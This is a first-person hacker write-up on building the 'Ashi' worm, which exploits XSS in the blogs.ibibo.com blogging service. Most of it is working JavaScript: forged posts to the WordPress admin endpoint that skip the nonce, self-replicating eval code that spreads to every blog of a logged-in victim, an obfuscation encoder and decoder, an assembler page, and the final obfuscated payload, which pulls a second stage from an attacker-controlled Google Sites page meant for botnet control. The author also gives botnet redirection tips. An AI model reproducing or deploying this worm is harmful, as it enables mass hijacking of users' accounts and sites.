"Demystifying The Ashi virus"

Author: "vinnu"

Vulnerability: I found several XSS vulnerabilities in ibibo.com.

Next, i searched for any good point which can give me a
point to automate the leveraging process. I found two php
pages post.php and new-post.php, which can submit my blog posts and
both the title
as well as the content were prone to XSS. So i developed a
script to find out the form elements:

javascript:var vin=document.getElementsByTagName("form")[0];
var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0)
{nunnu=vin.item(iter).name+"="+vin.item(iter).value;
}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;
}}alert(nunnu);

The above script retrieves the form elements and their values.
So now i had the script (you have to alter above script a
little to increase the form index to a suitable value to reach
the target form as:

javascript:var vin=document.getElementsByTagName("form")[2];
var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0)
{nunnu=vin.item(iter).name+"="+vin.item(iter).value;
}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;
}}alert(nunnu);

Paste above script in address-bar of the browser when the

"http://blogs.ibibo.com/<your-blog>/wp-admin/"

Page will open. I wrote "Namaste" in title & "Hows the life
there" in content box. It gave me following in a dialogue
box:

post_title=Namaste&content=Hows the life there&tags_input=

&action=post-quickpress-save&quickpress_post_ID=0
&_wpnonce=3a7721d78d&_wp_http_referer=/vulnerable/wp-admin/
&save=Save Draft&=Cancel&publish=Publish

It seems like they are checking the referer (_wp_http_referer)

and a nonce [_wpnonce] (well nonce is always the same everytime
I tried to post).
But still the nonce appears in a page which cannot be directly
XSSed. So i just tried to post the request without the referer
and nonce.

javascript:blog(); function blog(){var nunnu="><scr"+"ipt

language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"<scr"+"ipt>";quote
="Sahdi bhasa sahdi jaan hai ji, tusaan sunhsaa...";var
blpayload="post_title="+quote;alert(nunnu);blpayload+=encodeURIComponent(nunnu);bl
payload+="&content=Jaijeya";blpayload+=encodeURIComponent(nunnu);blpayload+="hor&t
ags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish";alert(blpayload);ajaxPSLV("http://blogs.ibibo.co
m/vulnerable/wp-admin/post.php",blpayload);}function ajaxPSLV(url, payload)
{ alert("url:\t"+url+"\npayload:\n"+payload);var xmlhttp; if
(window.XMLHttpRequest) {xmlhttp = new XMLHttpRequest(); }else if
(window.ActiveXObject) {try {xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}
catch (e) { try {xmlhttp = new
ActiveXObject("Msxml2.XMLHTTP");} catch (e) { return;}
} } alert("sending");xmlhttp.open("POST", url,
true);xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-
urlencoded");xmlhttp.setRequestHeader("Content-length",
payload.length);alert("sending:\t"+payload.length);xmlhttp.send(payload);alert("se
nt");}alert("done");

It worked and it posted the blog even without the nonce and
referer defined in querystring. But there is a problem.
The script is appearing on the heading and also I wanted
the script to post a different topic everytime it gets executed
so i introduced the well known following circuit for chosing
one of strings out of a list:

var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];

After assembling it with above script i got the following code:

javascript:blog();
function blog(){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
 quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
blpayload+=encodeURIComponent(nunnu);
blpayload+="hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV("http://blogs.ibibo.com/vulnerable/wp-
admin/post.php",blpayload);
}
function ajaxPSLV(url, payload) {
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-
urlencoded");
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
}alert("done");

But i don't want my worm to just post in a hardcoded blog.

It must search for all the blogs of the user and inject
the posts as the above post did.

To do this i have to check hrefs of all the anchors. Because

The blog names are appearing within the page and when we click
on any one the respective blog changes.

javascript:var vin=document.getElementsByTagName("a");var
nunn="";for(var i=0;i<vin.length;i++){nunn+=vin[i].href+"\n";}alert(nunn);

But there are also several other items along with blogs.
So my virus must identify the blogs out of other objects.
I checked the pattern.

After a careful inspection, I found that the hrefs which

has wp-admin in their href are the references of blogs of
the user. So i developed another script to check and it:

javascript:test();
function test() {
 var list="";
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
var intex=0;
for(var iter=0;iter<vin.length;iter++){
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
list += address+"\n";intex++;
}}alert(intex+"\n"+list);}

Now, i have got a way to identify the blogs out of other objects
and post the random topics.

By combining these all a beast started to take the shape as:

javascript:trigger();
function trigger() {
var vin=document.getElementsByTagName("a");
var total=0;var index=0;var address;
for(var iter=0;iter<vin.length;iter++){
if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
address=vin[iter].href.substring(0,index+8)+"/post.php";
blog(address);
}}}
function blog(addr){
var nunnu="><scr"+"ipt language=javascript"+"
src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a
href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
var no=Math.floor(Math.random()*10);
var quote=new Array(10);
quote[0]="Sahdi bhasa sahdi jaan...";
quote[1]="Don't you think we can...";
quote[2]="Thats the attitude...Keep it up.";
quote[3]="Intelligent?..";
quote[4]="Main koi machine thodi hai...";
quote[5]="Jaijeya ji! Theek hainn na?...";
quote[6]="Veero! Tusaan Eh bhi parhi leya";
quote[7]="Himachal a heaven...";
quote[8]="Free Tibet...";
quote[9]="Pahari (Kangri) dialoge must be respected and registered as a
language...";
var blpayload="post_title="+quote[no];
blpayload+=encodeURIComponent(nunnu);
blpayload+="&content=Jaijeya</p></div";
blpayload+=encodeURIComponent("><"+"sc"+"ript language=javascript>var
ashi='"+nunnu+"';eval(ashi);<"+"/sc"+"ript>");
blpayload+="hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish";
alert(blpayload); ajaxPSLV(addr,blpayload);
}
function ajaxPSLV(url, payload) {
alert("url:\t"+url+"\npayload:\n"+payload);
var xmlhttp; if (window.XMLHttpRequest){
 xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
return;}}}alert("sending");xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type","application/x-www-form-
urlencoded");
xmlhttp.setRequestHeader("Content-length", payload.length);
alert("sending:\t"+payload.length);
xmlhttp.send(payload);alert("sent");
};

But i thought the title was not a good place to inject the code
as it will appear in dashboard. So I placed the code in the argument
of post.php named "content" instead of "post_title".

The variable "nunnu" contains the code for a script which retrieves
the remote javascript file at:

http://sites.google.com/site/urcontrolledsite/ibibo.js

This is a google's free page uploading facility

(http://sites.google.com/site).
I loaded the .js file as an attatchment. But it contained nothing
initially.
It was meant for controlling the Botnet and commanding it later in
forming
the XSS tunnels. It was the second stage of two staged botnet
formation.

Note: The third party free sites are also useful to connect to a botnet if
you do not have any dedicated server. In ur script file at free site like google,
you can place a script that can redirect the requests to ur home computer. This
can
be achieved by using a simplest <script> tag with its "src" attribute defined to
ur
home computer's current IP address. But this makes it necessary to remove such
redirector
scripts or change the IP address everytime you get a new IP address or disconnect.
Otherwise,
the botnet will be orphaned or will end up in chaos.

Now, we have formed a script. But still; it cannot go beyond the

currently
infected blogs.

We need to direct our script to inject itself (whole script) into other
blogs also. This can be achieved by a enclosing whole script into a
string
variable and then using the eval() method.
The eval () method takes a string type argument that holds the code for
execution and executes the code.

For example, if we have some code in a variable vinnu and we want to

execute
 it, then we can do it like:

var vinnu = "alert(document.cookie);";

eval(vinnu);

So what we can do now is, we have to equate above all code into a
variable
and then feed this very variable to the "content" variable and eval
the variable as in above script.

I defined a variable named "ashi" and fed it to the "content" in blogs

payload
for posting it to the post.php. And finally called eval();

Note: Check this scenario:

eval(vinnu);alert(vinnu);var vinnu="alert(document.cookie)";

This script will fail. It works normally with the lately defined function, but not
with variables.
The above script will work second time, but will fail for first time, So never use
it:

eval(vinnu);var vinnu="alert(document.cookie)";

This is because When it gets executed for first time, eval cannot resolve variable
as variables
should be defined first and called later (Not the case with functions).
But the in second attempt, it already has defined the variable "vinnu" after the
failure of eval
during first execution.

Also the alert() method is added just for debugging purpose and it must be removed
in final product.

Therefor It should now look like something:

var ashi='trigger();function trigger(){var vin=.....

....................................................
....................................................
blpayload+=encodeURIComponent(\"><\"+\"sc\"+\"ript
language=javascript>var ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \");
blpayload+=encodeURIComponent(nunnu);...............
....................................................

The important part here I want to discus is:

\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \"
 Now i have turned whole script into a string variable.
And thats why i have to escape all double and single quotation marks
with a preffixed escape character ( \ ).

Also i have to explicitely define variable "ashi" once again within

the string also. This is necessary. We want the code to regain the
shape
of its parent code once again. And the parent code itself starts with

<script>var ashi = '..........

Also remember that do not specify <script> or </script> anywhere even

within the string or variable. This is because the browser's javascript
engine will take </script> tag as the end of the script code.
So always break it into pieces as:

"</sc"+"rip"+"t>"

Now after applying above concepts I got the following code:

javascript:var ashi='trigger();function trigger(){var

vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var iter=0;iter<vin.length;iter++)
{if((index=vin[iter].href.indexOf(\"wp-admin\"))!=-1)
{address=vin[iter].href.substring(0,index+8)+\"/post.php\";blog(address);}}}functi
on blog(addr){var nunnu=\"><scr\"+\"ipt language=javascript\"+\"
src=\\"http://sites.google.com/site/urcontrolledsite/ibibo.js\\"></scr\"+\"ipt><a
href=\\"\\" onmouseover=javascript:blog();>Jaijeya</a><a \";var
no=Math.floor(Math.random()*10);var quote=new Array(10);quote[0]=\"Sahdi bhasa
sahdi jaan...\";quote[1]=\"Dont you think we can...\";quote[2]=\"Thats the
attitude...Keep it up.\";quote[3]=\"Intelligent?..\";quote[4]=\"Main koi machine
thodi hai...\";quote[5]=\"Jaijeya ji! Theek hainn na?...\";quote[6]=\"Veero!
Tusaan Eh bhi parhi leya\";quote[7]=\"Himachal a heaven...\";quote[8]=\"Free
Tibet...\";quote[9]=\"Paharhi!lovely language...\";var
blpayload=\"post_title=\"+quote[no];blpayload+=\"&content=Jaijeya></p></div\";blpa
yload+=encodeURIComponent(\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(ashi);<\"+\"/sc\"+\"ript><a \");blpayload+=encodeURICompo
nent(nunnu);blpayload+=\"hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish\";ajaxPSLV(addr,blpayload);}function
ajaxPSLV(url,payload){var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new
XMLHttpRequest();}else if(window.ActiveXObject){try{xmlhttp=new
ActiveXObject(\"Microsoft.XMLHTTP\");}catch(e){try{xmlhttp=new
ActiveXObject(\"Msxml2.XMLHTTP\");}catch(e){return;}}}xmlhttp.open(\"POST\", url,
true);xmlhttp.setRequestHeader(\"Content-Type\",\"application/x-www-form-
urlencoded\");xmlhttp.setRequestHeader(\"Content-
length\",payload.length);xmlhttp.send(payload);alert(payload);}';eval(ashi);alert(
"done");

The HTML tags which are appearing within the script are for the
alignment of the Injection Vector of the XSS payload.
 The virus is ready. And u can trigger it now from your web-browser's
addressbar while you are already logged in into the blogs.ibibo.com.

But this virus is still in clear text. So why not apply some scrambling
to it. There are some easiest and fast ways to do it (There are also
robust
encryption schemes like DES, SHA, RSA, base64,..etc. But i used the
simplest
to save the processing overhead).

One simplest way to do it by using escape() and its decoder is

unescape(). The escape()
function converts special charecters into their hex form by prefixing
the
hex with a "%" sign. We can use escape multiple times.

The first call will escape all the special charecters like, /\$#@!~
%^&*()_+|"'
?><,./;:[]{}~` etc into their hex equivalent and second call to escape
will
escape the % signs once again. We can use escape severaltimes. But
remember
to unescape the code equal number of times as:

vinnu = escape(escape(vinnu));

And similarly unescaping:

vinnu = unescape(unescape(vinnu));

Remember more you'll escape it will increase the size of scramble

everytime.
Now I have a facility to convert all special charecters. But what about
the
character literals. I have to develop a special encoder and decoder for
them.
I don't want to scramble all of the characters, just jumbling some of
them will
be enough.

As a choice for encryption technique, i used the several thousand years

old
technique ... the transformation technique and the script I developed
is

The encoder:

function z(x) {
x=escape(x);
var s="",r="";
for(var i=0;i<x.length;i++) {
s=x.charAt(i);
if(s=="%") {
s="Q";
}else if(s=="i"){s="Z"}else if(s=="a"){s="J";}else if(s=="t")
{s="F";}
else{s=x.charAt(i);}
 r+=s;
}return r; }

The decoder:

function y(x) {
var s="",r="";
for(var i=0;i<x.length;i++) { s=x.charAt(i);
if(s=="Q"){
s="%";
}else if(s=="Z"){s="i";}else if(s=="J"){s="a";}else
if(s=="F"){s="t";}
else{s=x.charAt(i);}
r+=s;
}r=unescape(r);return r;
}

I just replaced"%" with "Q", "i" with "Z", "a" with "J", and "t" with
"F".

Note: There was a bug, it replaced the "Free tibet" to "tree Tibet" because of "F"
<==> "t"
conversion. I noticed it after the infection started. And in the beginning i
couldn't identify
the posts with "tree tibet" topic.

My Apology: It is important and I apologize for this mistake. I support the

Tibetan protest for
Holy Land "The Tibet". This mistake really shook my heart when I first noticed it.

I've used the encoder only once in this case. And the virus code
contained the
scrambled code and a decoder and and eval().

The decoder code was also inside the scramble and while infecting it
should also
place the unscrambled decoder and eval() function in the body of virus.

Once the code executed it will infect other blogs with decoder and eval
attached
at the end of the scrambled code.

But the decoder has a problem in this case. Once it will go under
scrambling, following
code will be interchanged as shown below:

s="i" to s="Z" making if(s=="Z"){s="i";} to if(s=="Z"){s="Z";}

Similarly for other charecters. And the decoder will fail to decode
properly.
So i interchanged the charecters with their hex equivalents and the
decoder
code was changed as shown below:

function y(x) {
 var s="",r="";
for(var i=0;i<x.length;i++) {
s=x.charAt(i);
if(s=="\x51") {
s="\x25";
}else if(s=="\x5A") {
s="\x69";
}else if(s=="\x4A") {
s="\x61";
}else if(s=="\x46") {
s="\x74";
}else {
s=x.charAt(i);
}r+=s;
}
r=unescape(r);return r;
}

After combining this decoder to the virul code before undergoing the
scrambling,
the beast acquired the following shape:

var ashi='trigger();function trigger(){var

vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var iter=0;iter<vin.length;iter++)
{if((index=vin[iter].href.indexOf(\"wp-admin\"))!=-1)
{address=vin[iter].href.substring(0,index+8)+\"/post.php\";blog(address);}}}functi
on blog(addr){var encodr=\"function y(x){var s=\\"\\",r=\\"\\";for(var
i=0;i<x.length;i++){s=x.charAt(i);if(s==\\"\\x51\\"){s=\\"\\x25\\";}else
if(s==\\"\\x5A\\"){s=\\"\\x69\\";}else if(s==\\"\\x4A\\"){s=\\"\\x61\\";}else
if(s==\\"\\x46\\"){s=\\"\\x74\\";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r;}\";var nunnu=\"><scr\"+\"ipt language=javascript\"+\"
src=\\"http://sites.google.com/site/cyberspecies/n/ibibo.js\\"></scr\"+\"ipt><a
href=\\"\\" onmouseover=javascript:eval(y(ashi));>jaijeya</a><a \";var
no=Math.floor(Math.random()*10);var quote=new Array(10);quote[0]=\"Sahdi bhasa
sahdi jaan...\";quote[1]=\"Dont you think we can...\";quote[2]=\"Thats the
attitude...Keep it up.\";quote[3]=\"Intelligent?..\";quote[4]=\"Main koi machine
thodi hai...\";quote[5]=\"jaijeya ji! Theek hainn na?...\";quote[6]=\"Veero!
Tusaan Eh bhi parhi leya\";quote[7]=\"Himachal a heaven...\";quote[8]=\"Free
Tibet...\";quote[9]=\"Paharhi!lovely language...\";var
blpayload=\"post_title=\"+quote[no];blpayload+=\"&content=jaijeya></p></div\";blpa
yload+=encodeURIComponent(\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(y(ashi));\"+encodr+\"<\"+\"/sc\"+\"ript><a \");blpayload+
=encodeURIComponent(nunnu);blpayload+=\"hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish\";ajaxPSLV(addr,blpayload);}function
ajaxPSLV(url,payload){var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new
XMLHttpRequest();}else if(window.ActiveXObject){try{xmlhttp=new
ActiveXObject(\"Microsoft.XMLHTTP\");}catch(e){try{xmlhttp=new
ActiveXObject(\"Msxml2.XMLHTTP\");}catch(e){return;}}}xmlhttp.open(\"POST\", url,
true);xmlhttp.setRequestHeader(\"Content-Type\",\"application/x-www-form-
urlencoded\");xmlhttp.setRequestHeader(\"Content-
length\",payload.length);xmlhttp.send(payload);}';
 Now I have all the assets in my hand and just have to assemble them
all.
So I framed a virul structure provided below:

var ashi='scrambled code';eval(y(ashi));

And for first trigger from address bar:

javascript:var ashi='scrambled code';eval(y(ashi));

Remember, try to use variable and function names short to make virul
code compact.

Now I just need to scramble the code. For this purpose I created a HTML
file
containing the code and encoder and decoder. This file will assemble
the virus
and will provide us the viral code. The HTML code is:

<html>
<head><title>Ashi assmebler by "vinnu"</title>

<script language=javascript>

var ashi='trigger();function trigger(){var

vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var iter=0;iter<vin.length;iter++)
{if((index=vin[iter].href.indexOf(\"wp-admin\"))!=-1)
{address=vin[iter].href.substring(0,index+8)+\"/post.php\";blog(address);}}}functi
on blog(addr){var encodr=\"function y(x){var s=\\"\\",r=\\"\\";for(var
i=0;i<x.length;i++){s=x.charAt(i);if(s==\\"\\x51\\"){s=\\"\\x25\\";}else
if(s==\\"\\x5A\\"){s=\\"\\x69\\";}else if(s==\\"\\x4A\\"){s=\\"\\x61\\";}else
if(s==\\"\\x46\\"){s=\\"\\x74\\";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r;}\";var nunnu=\"><scr\"+\"ipt language=javascript\"+\"
src=\\"http://sites.google.com/site/cyberspecies/n/ibibo.js\\"></scr\"+\"ipt><a
href=\\"\\" onmouseover=javascript:eval(y(ashi));>jaijeya</a><a \";var
no=Math.floor(Math.random()*10);var quote=new Array(10);quote[0]=\"Sahdi bhasa
sahdi jaan...\";quote[1]=\"Dont you think we can...\";quote[2]=\"Thats the
attitude...Keep it up.\";quote[3]=\"Intelligent?..\";quote[4]=\"Main koi machine
thodi hai...\";quote[5]=\"jaijeya ji! Theek hainn na?...\";quote[6]=\"Veero!
Tusaan Eh bhi parhi leya\";quote[7]=\"Himachal a heaven...\";quote[8]=\"Free
Tibet...\";quote[9]=\"Paharhi!lovely language...\";var
blpayload=\"post_title=\"+quote[no];blpayload+=\"&content=jaijeya></p></div\";blpa
yload+=encodeURIComponent(\"><\"+\"sc\"+\"ript language=javascript>var
ashi=\'\"+ashi+\"\';eval(y(ashi));\"+encodr+\"<\"+\"/sc\"+\"ript><a \");blpayload+
=encodeURIComponent(nunnu);blpayload+=\"hor&tags_input=&action=post-quickpress-
save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save
%20Draft&=Cancel&publish=Publish\";ajaxPSLV(addr,blpayload);}function
ajaxPSLV(url,payload){var xmlhttp;if(window.XMLHttpRequest){xmlhttp=new
XMLHttpRequest();}else if(window.ActiveXObject){try{xmlhttp=new
ActiveXObject(\"Microsoft.XMLHTTP\");}catch(e){try{xmlhttp=new
ActiveXObject(\"Msxml2.XMLHTTP\");}catch(e){return;}}}xmlhttp.open(\"POST\", url,
true);xmlhttp.setRequestHeader(\"Content-Type\",\"application/x-www-form-
urlencoded\");xmlhttp.setRequestHeader(\"Content-
length\",payload.length);xmlhttp.send(payload);}';

ashi = z(ashi);
var fuse = ';function y(x){var s=\"\",r=\"\";for(var i=0;i<x.length;i+
+){s=x.charAt(i);if(s==\"Q\"){s=\"%\";}else if(s==\"Z\"){s=\"i\";}else
if(s==\"J\"){s=\"a\";}else if(s==\"F\")
{s=\"t\";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r; };eval(y(ashi));alert(\"Decoded and executed: \"+y(ashi));';
var assembledAshi = "javascript:var ashi='"+z(ashi)+"'"+fuse;
var vhtml = "<P><PRE>" + assembledAshi+"</PRE></P>";

function z(x) {x=escape(x);var s="",r="";for(var i=0;i<x.length;i+

+){ s=x.charAt(i); if(s=="%"){s="Q";}else if(s=="i"){s="Z"}else if(s=="a")
{s="J";}else if(s=="t"){s="F";}else{s=x.charAt(i);}r+=s;}return r; }
function y(x) {var s="",r="";for(var i=0;i<x.length;i++)
{ s=x.charAt(i); if(s=="Q"){s="%";}else if(s=="Z"){s="i";}else if(s=="J")
{s="a";}else if(s=="F"){s="t";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r; }

</script>

</head>
<body>
<H1>The Ashi virus Assembler.</H1>
<HR>
<br>
<div id="viraldiv"><H3> love you nunnu</H3>
The viral Code:<BR><HR>
<script language=javascript>document.write(vhtml);</script>
<HR>
<div>

</body>
</html>

And the final assembled code is:

javascript:var
ashi='FrZggerQ28Q29Q3BfuncFZonQ20FrZggerQ28Q29Q7BvJrQ20vZnQ3DdocumenF.geFElemenFsB
yTJgNJmeQ28Q22JQ22Q29Q3BvJrQ20FoFJlQ3D0Q3BvJrQ20ZndexQ3D0Q3BvJrQ20JddressQ3BforQ28
vJrQ20ZFerQ3D0Q3BZFerQ3CvZn.lengFhQ3BZFer+
+Q29Q7BZfQ28Q28ZndexQ3DvZnQ5BZFerQ5D.href.ZndexOfQ28Q22wp-JdmZnQ22Q29Q29Q21Q3D-
1Q29Q7BJddressQ3DvZnQ5BZFerQ5D.href.subsFrZngQ280Q2CZndex+8Q29+Q22/posF.phpQ22Q3Bb
logQ28JddressQ29Q3BQ7DQ7DQ7DfuncFZonQ20blogQ28JddrQ29Q7BvJrQ20encodrQ3DQ22funcFZon
Q20yQ28xQ29Q7BvJrQ20sQ3DQ5CQ22Q5CQ22Q2CrQ3DQ5CQ22Q5CQ22Q3BforQ28vJrQ20ZQ3D0Q3BZQ3C
x.lengFhQ3BZ+
+Q29Q7BsQ3Dx.chJrAFQ28ZQ29Q3BZfQ28sQ3DQ3DQ5CQ22Q5Cx51Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx25Q
5CQ22Q3BQ7DelseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx5AQ5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx69Q5CQ22Q3BQ7D
elseQ20ZfQ28sQ3DQ3DQ5CQ22Q5Cx4AQ5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx61Q5CQ22Q3BQ7DelseQ20ZfQ2
8sQ3DQ3DQ5CQ22Q5Cx46Q5CQ22Q29Q7BsQ3DQ5CQ22Q5Cx74Q5CQ22Q3BQ7DelseQ7BsQ3Dx.chJrAFQ28
ZQ29Q3BQ7Dr+Q3DsQ3BQ7DrQ3DunescJpeQ28rQ29Q3BreFurnQ20rQ3BQ7DQ22Q3BvJrQ20nunnuQ3DQ2
2Q3EQ3CscrQ22+Q22ZpFQ20lJnguJgeQ3DjJvJscrZpFQ22+Q22Q20srcQ3DQ5CQ22hFFpQ3A//sZFes.g
oogle.com/sZFe/cyberspecZes/n/ZbZbo.jsQ5CQ22Q3EQ3C/scrQ22+Q22ZpFQ3EQ3CJQ20hrefQ3DQ
5CQ22Q5CQ22Q20onmouseoverQ3DjJvJscrZpFQ3AevJlQ28yQ28JshZQ29Q29Q3BQ3EjJZjeyJQ3C/JQ3
EQ3CJQ20Q22Q3BvJrQ20noQ3DMJFh.floorQ28MJFh.rJndomQ28Q29*10Q29Q3BvJrQ20quoFeQ3DnewQ
20ArrJyQ2810Q29Q3BquoFeQ5B0Q5DQ3DQ22SJhdZQ20bhJsJQ20sJhdZQ20jJJn...Q22Q3BquoFeQ5B1
Q5DQ3DQ22DonFQ20youQ20FhZnkQ20weQ20cJn...Q22Q3BquoFeQ5B2Q5DQ3DQ22ThJFsQ20FheQ20JFF
ZFude...KeepQ20ZFQ20up.Q22Q3BquoFeQ5B3Q5DQ3DQ22InFellZgenFQ3F..Q22Q3BquoFeQ5B4Q5DQ
3DQ22MJZnQ20koZQ20mJchZneQ20FhodZQ20hJZ...Q22Q3BquoFeQ5B5Q5DQ3DQ22jJZjeyJQ20jZQ21Q
20TheekQ20hJZnnQ20nJQ3F...Q22Q3BquoFeQ5B6Q5DQ3DQ22VeeroQ21Q20TusJJnQ20EhQ20bhZQ20p
JrhZQ20leyJQ22Q3BquoFeQ5B7Q5DQ3DQ22HZmJchJlQ20JQ20heJven...Q22Q3BquoFeQ5B8Q5DQ3DQ2
2FreeQ20TZbeF...Q22Q3BquoFeQ5B9Q5DQ3DQ22PJhJrhZQ21lovelyQ20lJnguJge...Q22Q3BvJrQ20
blpJyloJdQ3DQ22posF_FZFleQ3DQ22+quoFeQ5BnoQ5DQ3BblpJyloJd+Q3DQ22Q26conFenFQ3DjJZje
yJQ3EQ3C/pQ3EQ3C/dZvQ22Q3BblpJyloJd+Q3DencodeURIComponenFQ28Q22Q3EQ3CQ22+Q22scQ22+
Q22rZpFQ20lJnguJgeQ3DjJvJscrZpFQ3EvJrQ20JshZQ3DQ27Q22+JshZ+Q22Q27Q3BevJlQ28yQ28Jsh
ZQ29Q29Q3BQ22+encodr+Q22Q3CQ22+Q22/scQ22+Q22rZpFQ3EQ3CJQ20Q22Q29Q3BblpJyloJd+Q3Den
codeURIComponenFQ28nunnuQ29Q3BblpJyloJd+Q3DQ22horQ26FJgs_ZnpuFQ3DQ26JcFZonQ3DposF-
quZckpress-
sJveQ26quZckpress_posF_IDQ3D0Q26_wpnonceQ3DQ26_wp_hFFp_refererQ3DQ26sJveQ3DSJveQ25
20DrJfFQ26Q3DCJncelQ26publZshQ3DPublZshQ22Q3BJjJxPSLVQ28JddrQ2CblpJyloJdQ29Q3BQ7Df
uncFZonQ20JjJxPSLVQ28urlQ2CpJyloJdQ29Q7BvJrQ20xmlhFFpQ3BZfQ28wZndow.XMLHFFpRequesF
Q29Q7BxmlhFFpQ3DnewQ20XMLHFFpRequesFQ28Q29Q3BQ7DelseQ20ZfQ28wZndow.AcFZveXObjecFQ2
9Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22MZcrosofF.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BFryQ7BxmlhFFpQ3DnewQ20AcFZveXObjecFQ28Q22Msxml2.XMLHTTPQ22Q29Q3BQ7DcJFchQ28
eQ29Q7BreFurnQ3BQ7DQ7DQ7DxmlhFFp.openQ28Q22POSTQ22Q2CQ20urlQ2CQ20FrueQ29Q3BxmlhFFp
.seFRequesFHeJderQ28Q22ConFenF-TypeQ22Q2CQ22JpplZcJFZon/x-www-form-
urlencodedQ22Q29Q3BxmlhFFp.seFRequesFHeJderQ28Q22ConFenF-
lengFhQ22Q2CpJyloJd.lengFhQ29Q3BxmlhFFp.sendQ28pJyloJdQ29Q3BQ7D';function y(x){var
s="",r="";for(var i=0;i<x.length;i++){s=x.charAt(i);if(s=="Q"){s="%";}else
if(s=="Z"){s="i";}else if(s=="J"){s="a";}else if(s=="F")
{s="t";}else{s=x.charAt(i);}r+=s;}r=unescape(r);return
r; };eval(y(ashi));alert("Decoded and executed: "+y(ashi));

The last alert has been added to the above viral code to make sure
that the virus is properly triggered. It is not a part of virus and
will not be replicated.

And thats it. The "Ashi" virus..."vinnu"

I have informed ibibo about this virus.

This virus is a very good example of artificial living organizms helping each
other for their living.

For example, they have stopped the new blog posts to be submitted now, but They
haven't yet removed the infection and virus is still on blogs.

And this virus having a stage two also available for retrieval of the code.

So either it can be upgraded to exploit other vulnerabilities or can also be used

to download another virus to already infected blogs and keep the infection one
step ahead of the developers reach...."vinnu"

Thanx a lot..."vinnu"